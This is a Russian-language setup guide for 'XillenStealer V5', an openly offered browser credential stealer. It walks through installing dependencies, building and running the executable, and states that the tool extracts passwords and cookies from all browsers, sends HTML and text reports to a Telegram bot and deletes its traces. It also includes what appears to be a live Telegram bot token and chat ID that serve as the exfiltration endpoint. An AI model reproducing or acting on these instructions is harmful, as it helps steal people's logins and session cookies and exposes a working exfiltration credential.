╔══════════════════════════════════════════════════════════╗
║      XILLENSTEALER V5 C++ - ИНСТРУКЦИЯ                   ║
╚══════════════════════════════════════════════════════════╝

📋 ШАГ 1: УСТАНОВИТЬ PYTHON БИБЛИОТЕКИ
   Откройте PowerShell/CMD и выполните:
   
   pip install pytelegrambotapi pywin32 pycryptodome browser-cookie3

📋 ШАГ 2: СОБРАТЬ ПРОЕКТ
   Запустите: BUILD_V5.bat
   
   Должно появиться: [+] BUILD SUCCESS!

📋 ШАГ 3: ЗАПУСТИТЬ
   Запустите: RUN.bat
   
   Или напрямую: xillen_v5.exe

✅ ЧТО ДЕЛАЕТСЯ:
   1. Соберёт данные из всех браузеров
   2. Создаст 2 отчёта (HTML и TXT) в папке temp
   3. Отправит файлы в Telegram через Python
   4. Удалит временные файлы

📊 В ТЕЛЕГРАМ ПРИДУТ:
   - report.html (красивый HTML-отчёт)
   - report.txt (текстовый отчёт)

💬 TELEGRAM НАСТРОЙКИ:
   Bot Token: 8474305805:AAHZ98s7nr9IAFQehnqh0x3iGV1OmVhTq9I
   Chat ID: 7368280792

🔧 ФАЙЛЫ ПРОЕКТА:
   - BUILD_V5.bat - сборка проекта
   - RUN.bat - запуск стиллера
   - xillen_v5.exe - скомпилированный файл
   - telegram_sender.py - отправка в Telegram
   - browser_extractor.py - извлечение паролей/куков

⚠️ ВАЖНО:
   - Python 3.x должен быть установлен
   - pytelegrambotapi должен быть установлен
   - Python должен быть в PATH

╔══════════════════════════════════════════════════════════╗
║  Если что-то не работает - проверьте все шаги!          ║
╚══════════════════════════════════════════════════════════╝
